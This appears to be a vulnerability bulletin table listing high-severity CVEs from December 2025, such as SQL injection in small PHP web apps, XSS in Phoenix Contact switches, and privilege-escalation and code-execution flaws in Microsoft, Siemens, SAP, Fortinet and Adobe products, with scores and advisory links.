| code-projects--Simple Attendance Record System | A vulnerability was found in code-projects Simple Attendance Record System 2.0. The affected element is an unknown function of the file /check.php. Performing manipulation of the argument student results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-12-14 | 7.3 | CVE-2025-14643 | VDB-336376 | code-projects Simple Attendance Record System check.php sql injection VDB-336376 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708236 | code-projects Simple Attendance Record System 2.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL20.md https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was determined in itsourcecode Student Management System 1.0. The impacted element is an unknown function of the file /update_subject.php. Executing manipulation of the argument ID can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-14 | 7.3 | CVE-2025-14644 | VDB-336377 | itsourcecode Student Management System update_subject.php sql injection VDB-336377 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708739 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/Bai-public/CVE/issues/2 https://itsourcecode.com/ |
| code-projects--Student File Management System | A vulnerability was identified in code-projects Student File Management System 1.0. This affects an unknown function of the file /admin/delete_user.php. The manipulation of the argument user_id leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-14 | 7.3 | CVE-2025-14645 | VDB-336378 | code-projects Student File Management System delete_user.php sql injection VDB-336378 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #709003 | Code-projects Student File Management System 1.0 SQL Injection Submit #709187 | Fabian Ros Student File Management System in PHP 1.0 (Released 2025-12-03) SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr7/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A security flaw has been discovered in code-projects Student File Management System 1.0. This impacts an unknown function of the file /admin/delete_student.php. The manipulation of the argument stud_id results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-14 | 7.3 | CVE-2025-14646 | VDB-336379 | code-projects Student File Management System delete_student.php sql injection VDB-336379 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #709032 | Code-projects Student File Management System v1.0 SQL Injection Submit #709193 | Fabian Ros Student File Management System in PHP 1.0 SQL Injection (Duplicate) https://github.com/jjjjj-zr/jjjjjzr8/issues/1 https://code-projects.org/ |
| code-projects--Computer Book Store | A weakness has been identified in code-projects Computer Book Store 1.0. Affected is an unknown function of the file /admin_delete.php. This manipulation of the argument bookisbn causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-14 | 7.3 | CVE-2025-14647 | VDB-336380 | code-projects Computer Book Store admin_delete.php sql injection VDB-336380 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #709618 | Code-projects Computer Book Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr11/issues/2 https://code-projects.org/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was detected in itsourcecode Online Cake Ordering System 1.0. Affected by this issue is some unknown functionality of the file /cakeshop/supplier.php. Performing manipulation of the argument supplier results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14649 | VDB-336382 | itsourcecode Online Cake Ordering System supplier.php sql injection VDB-336382 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710247 | itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/60 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A flaw has been found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown part of the file /cakeshop/product.php. Executing manipulation of the argument Product can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-14 | 7.3 | CVE-2025-14650 | VDB-336383 | itsourcecode Online Cake Ordering System product.php sql injection VDB-336383 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710248 | tsourcecode Online Cake Ordering System Online Cake Ordering System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/61 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This issue affects some unknown processing of the file /admindetail.php?action=edit. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-12-14 | 7.3 | CVE-2025-14652 | VDB-336385 | itsourcecode Online Cake Ordering System admindetail.php sql injection VDB-336385 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #712648 | itsourcecode Online Cake Ordering System V1.0 sql https://github.com/moonrains/test/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was determined in itsourcecode Student Management System 1.0. Impacted is an unknown function of the file /addrecord.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-14 | 7.3 | CVE-2025-14653 | VDB-336386 | itsourcecode Student Management System addrecord.php sql injection VDB-336386 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #712651 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/moonrains/content/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Managemen System | A vulnerability has been found in itsourcecode Student Managemen System 1.0. Affected by this issue is some unknown functionality of the file /advisers.php. Such manipulation of the argument sy leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14661 | VDB-336393 | itsourcecode Student Managemen System advisers.php sql injection VDB-336393 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713742 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/27 https://itsourcecode.com/ |
| Campcodes--Supplier Management System | A vulnerability was identified in Campcodes Supplier Management System 1.0. This issue affects some unknown processing of the file /admin/view_unit.php. The manipulation of the argument chkId[] leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-12-14 | 7.3 | CVE-2025-14664 | VDB-336396 | Campcodes Supplier Management System view_unit.php sql injection VDB-336396 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714163 | Campcodes Supplier Management System V1.0 SQL Injection https://github.com/louxiadelaolitou/CVE/issues/3 https://www.campcodes.com/ |
| itsourcecode--COVID Tracking System | A weakness has been identified in itsourcecode COVID Tracking System 1.0. The affected element is an unknown function of the file /admin/?page=user. This manipulation of the argument Username causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-12-14 | 7.3 | CVE-2025-14666 | VDB-336398 | itsourcecode COVID Tracking System page sql injection VDB-336398 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714786 | itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/bardminx/Lonlydance/issues/2 https://itsourcecode.com/ |
| itsourcecode--COVID Tracking System | A security vulnerability has been detected in itsourcecode COVID Tracking System 1.0. The impacted element is an unknown function of the file /admin/?page=system_info. Such manipulation of the argument meta_value leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2025-12-14 | 7.3 | CVE-2025-14667 | VDB-336399 | itsourcecode COVID Tracking System page sql injection VDB-336399 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714805 | itourcecode COVID Tracking System V1.0 SQL Injection https://github.com/bardminx/Lonlydance/issues/3 https://itsourcecode.com/ |
| campcodes--Advanced Online Examination System | A vulnerability was detected in campcodes Advanced Online Examination System 1.0. This affects an unknown function of the file /query/loginExe.php. Performing manipulation of the argument Username results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14668 | VDB-336400 | campcodes Advanced Online Examination System loginExe.php sql injection VDB-336400 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714806 | campcodes Advanced Online Examination System V1.0 SQL Injection https://github.com/gravity123123/CVE/issues/1 https://www.campcodes.com/ |
| gmg137--snap7-rs | A flaw has been found in gmg137 snap7-rs up to 1.142.1. This impacts the function TSnap7MicroClient::opWriteArea of the file s7_micro_client.cpp. Executing manipulation can lead to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2025-12-14 | 7.3 | CVE-2025-14672 | VDB-336401 | gmg137 snap7-rs s7_micro_client.cpp opWriteArea heap-based overflow VDB-336401 | CTI Indicators (IOB, IOC, IOA) https://gitee.com/gmg137/snap7-rs/issues/ID2H8E |
| gmg137--snap7-rs | A vulnerability has been found in gmg137 snap7-rs up to 1.142.1. Affected is the function snap7_rs::client::S7Client::as_ct_write of the file /tests/snap7-rs/src/client.rs. The manipulation leads to heap-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-14 | 7.3 | CVE-2025-14673 | VDB-336402 | gmg137 snap7-rs client.rs as_ct_write heap-based overflow VDB-336402 | CTI Indicators (IOB, IOC, IOA) https://gitee.com/gmg137/snap7-rs/issues/ID2H74 |
| n/a--Universal Boot Loader (U-Boot) before 2017.11 and Qualcomm chips IPQ4019, IPQ5018, IPQ5322, IPQ6018, IPQ8064, IPQ8074, and IPQ9574 | Improper access control for volatile memory containing boot code in Universal Boot Loader (U-Boot) before 2017.11 and Qualcomm chips IPQ4019, IPQ5018, IPQ5322, IPQ6018, IPQ8064, IPQ8074, and IPQ9574 could allow an attacker to execute arbitrary code. | 2025-12-10 | 7.6 | CVE-2025-24857 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-343-01 |
| Infinera--MTC-9 | Improper Input Validation vulnerability in Infinera MTC-9 allows remote unauthenticated users to crash the service and cause a reboot of the appliance, thus causing a DoS condition, via crafted XML payloads. This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 7.5 | CVE-2025-26488 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-26488 |
| Siemens--COMOS V10.6 | A vulnerability has been identified in COMOS V10.6 (All versions), COMOS V10.6 (All versions), NX V2412 (All versions < V2412.8700), NX V2506 (All versions < V2506.6000), Simcenter 3D (All versions < V2506.6000), Simcenter Femap (All versions < V2506.0002), Solid Edge SE2025 (All versions < V225.0 Update 10), Solid Edge SE2026 (All versions < V226.0 Update 1). The IAM client in affected products is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack. | 2025-12-09 | 7.4 | CVE-2025-40800 | https://cert-portal.siemens.com/productcert/html/ssa-868571.html https://cert-portal.siemens.com/productcert/html/ssa-212953.html |
| Siemens--SIDOOR ATD430W | Affected products do not properly enforce TCP sequence number validation in specific scenarios but accept values within a broad range. This could allow an unauthenticated remote attacker e.g. to interfere with connection setup, potentially leading to a denial of service. The attack succeeds only if an attacker can inject IP packets with spoofed addresses at precisely timed moments, and it affects only TCP-based services. | 2025-12-09 | 7.5 | CVE-2025-40820 | https://cert-portal.siemens.com/productcert/html/ssa-915282.html |
| Siemens--Simcenter Femap | A vulnerability has been identified in Simcenter Femap (All versions < V2512). The affected applications contains an uninitialized memory vulnerability while parsing specially crafted SLDPRT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-27146) | 2025-12-12 | 7.8 | CVE-2025-40829 | https://cert-portal.siemens.com/productcert/html/ssa-512988.html |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in dyn_conn.php can be used by an unauthenticated remote attacker to trick an authenticated user to send a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41695 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portCntr2.php can be used by an unauthenticated remote attacker to trick an authenticated user to send a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41745 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portSecCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to send a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41746 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_vlanIntfCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to send a manipulated POST request to the device in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41747 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_Dot1xCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41748 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in port_util.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41749 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_PortCfg.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41750 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portCntr.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41751 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An XSS vulnerability in pxc_portSfp.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user. | 2025-12-09 | 7.1 | CVE-2025-41752 | https://certvde.com/en/advisories/VDE-2025-071/ |
| SAP_SE--SAP NetWeaver (remote service for Xcelsius) | SAP NetWeaver remote service for Xcelsius allows an attacker with network access and high privileges to execute arbitrary code on the affected system due to insufficient input validation and improper handling of remote method calls. Exploitation does not require user interaction and could lead to service disruption or unauthorized system control. This has high impact on integrity and availability, with no impact on confidentiality. | 2025-12-09 | 7.9 | CVE-2025-42874 | https://me.sap.com/notes/3640185 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP S/4 HANA Private Cloud (Financials General Ledger) | Due to a Missing Authorization Check vulnerability in SAP S/4 HANA Private Cloud (Financials General Ledger), an authenticated attacker with authorization limited to a single company code could read sensitive data and post or modify documents across all company codes. Successful exploitation could result in a high impact to confidentiality and a low impact to integrity, while availability remains unaffected. | 2025-12-09 | 7.1 | CVE-2025-42876 | https://me.sap.com/notes/3672151 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Web Dispatcher, Internet Communication Manager and SAP Content Server | SAP Web Dispatcher, Internet Communication Manager (ICM), and SAP Content Server allow an unauthenticated user to exploit logical errors that lead to a memory corruption vulnerability. This results in high impact on the availability with no impact on confidentiality or integrity of the application. | 2025-12-09 | 7.5 | CVE-2025-42877 | https://me.sap.com/notes/3677544 https://url.sap/sapsecuritypatchday |
| Dell--Dell Encryption | Dell Encryption, versions prior to 11.12.1, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A local malicious user could potentially exploit this vulnerability, leading to Elevation of privileges. | 2025-12-09 | 7.3 | CVE-2025-46637 | https://www.dell.com/support/kbdoc/en-us/000394657/dsa-2025-442 |
| Fortinet--FortiSandbox | An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests. | 2025-12-09 | 7 | CVE-2025-53949 | https://fortiguard.fortinet.com/psirt/FG-IR-25-479 |
| Microsoft--Windows 10 Version 1809 | Improper neutralization of special elements used in a command ('command injection') in Windows PowerShell allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-54100 | PowerShell Remote Code Execution Vulnerability |
| Meta--react-server-dom-webpack | A pre-authentication denial of service vulnerability exists in React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, which can cause an infinite loop that hangs the server process and may prevent future HTTP requests from being served. | 2025-12-11 | 7.5 | CVE-2025-55184 | https://www.facebook.com/security/advisories/cve-2025-55184 https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components |
| Microsoft--Windows 11 Version 25H2 | Out-of-bounds read in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-55233 | Windows Projected File System Elevation of Privilege Vulnerability |
| PowerDNS--Recursor | An attacker can trigger the removal of cached records by sending a NOTIFY query over TCP. | 2025-12-09 | 7.5 | CVE-2025-59030 | https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2025-08.html |
| Microsoft--Windows 10 Version 1809 | Missing authentication for critical function in Windows Storage VSP Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-59516 | Windows Storage VSP Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Storage VSP Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-59517 | Windows Storage VSP Driver Elevation of Privilege Vulnerability |
| Fortinet--FortiVoice | Multiple Improper Limitations of a Pathname to a Restricted Directory ('Path Traversal') vulnerabilities [CWE-22] vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 may allow a privileged authenticated attacker to write arbitrary files via specifically HTTP or HTTPS commands | 2025-12-09 | 7.7 | CVE-2025-60024 | https://fortiguard.fortinet.com/psirt/FG-IR-25-812 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62221 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Heap-based buffer overflow in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62454 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows Message Queuing allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62455 | Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Out-of-bounds read in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62457 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62458 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62461 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62462 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Buffer over-read in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62464 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Null pointer dereference in Windows Client-Side Caching (CSC) Service allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62466 | Windows Client-Side Caching Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Integer overflow or wraparound in Windows Projected File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62467 | Windows Projected File System Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7 | CVE-2025-62469 | Microsoft Brokering File System Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62470 | Windows Common Log File System Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use of uninitialized resource in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62472 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62474 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability |
| Microsoft--Microsoft Office 2019 | Relative path traversal in Microsoft Office Access allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62552 | Microsoft Access Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62553 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7 | CVE-2025-62555 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62556 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62558 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62559 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62560 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62561 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62562 | Microsoft Outlook Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62563 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2025-12-09 | 7.8 | CVE-2025-62564 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Shell allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.3 | CVE-2025-62565 | Windows File Explorer Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Microsoft Brokering File System allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7 | CVE-2025-62569 | Microsoft Brokering File System Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Improper access control in Windows Camera Frame Server Monitor allows an authorized attacker to disclose information locally. | 2025-12-09 | 7.1 | CVE-2025-62570 | Windows Camera Frame Server Monitor Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows Installer allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62571 | Windows Installer Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Application Information Services allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-62572 | Application Information Service Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DirectX allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7 | CVE-2025-62573 | DirectX Graphics Kernel Elevation of Privilege Vulnerability |
| Fortinet--FortiWeb | A reliance on cookies without validation and integrity checking vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an unauthenticated attacker to execute arbitrary operations on the system via crafted HTTP or HTTPS request via forged cookies, requiring prior knowledge of the FortiWeb serial number. | 2025-12-09 | 7.1 | CVE-2025-64447 | https://fortiguard.fortinet.com/psirt/FG-IR-25-945 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Shell allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.5 | CVE-2025-64658 | Windows File Explorer Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Shell allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64661 | Windows Shell Elevation of Privilege Vulnerability |
| Microsoft--Microsoft Exchange Server 2019 Cumulative Update 15 | Improper input validation in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network. | 2025-12-09 | 7.5 | CVE-2025-64666 | Microsoft Exchange Server Elevation of Privilege Vulnerability |
| Microsoft--Windows Admin Center | Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges locally. | 2025-12-11 | 7.8 | CVE-2025-64669 | Windows Admin Center Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Storvsp.sys Driver allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64673 | Windows Storage VSP Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64679 | Windows DWM Core Library Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2025-12-09 | 7.8 | CVE-2025-64680 | Windows DWM Core Library Elevation of Privilege Vulnerability |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.8 | CVE-2025-64783 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure or application denial of service. An attacker could leverage this vulnerability to disclose sensitive memory information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 7.1 | CVE-2025-64784 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
